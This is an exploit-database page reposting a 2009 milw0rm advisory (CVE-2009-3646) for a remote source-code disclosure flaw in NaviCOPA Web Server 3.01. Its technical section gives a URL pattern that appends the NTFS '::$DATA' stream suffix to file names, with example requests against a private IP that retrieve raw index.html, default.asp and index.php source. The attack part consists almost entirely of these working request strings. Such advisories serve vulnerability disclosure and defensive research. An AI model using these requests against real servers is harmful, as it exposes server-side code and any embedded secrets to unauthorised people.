NaviCOPA Web Server 3.01 Remote Source Code Disclosure Vulnerability



EDB-ID: 9694 CVE: 2009-3646OSVDB-ID: 58386
Author: Dr_IDEPublished: 2009-09-16Verified: Verified
Exploit Code:   DownloadVulnerable App:   N/A

Rating

(0.0)
Prev Home Next
#################################################################################
#
# NaviCOPA Web Server 3.01 Remote Source Code Disclosure
# Found By:		Dr_IDE
# Tested On:	Windows XPSP3
#
#################################################################################
- Description -
NaviCOPA Web Server 3.01 is a Windows based HTTP server. This is the latest version of
the application available.
NaviCOPA is vulnerable to remote arbitrary source code disclosure by the following means.
- Technical Details -
	http://[ webserver IP]/[ file ][::$DATA]
	http://172.16.2.101/index.html::$DATA
	http://172.16.2.101/default.asp::$DATA
	http://172.16.2.101/index.php::$DATA
# milw0rm.com [2009-09-16]






Comments

No comments so far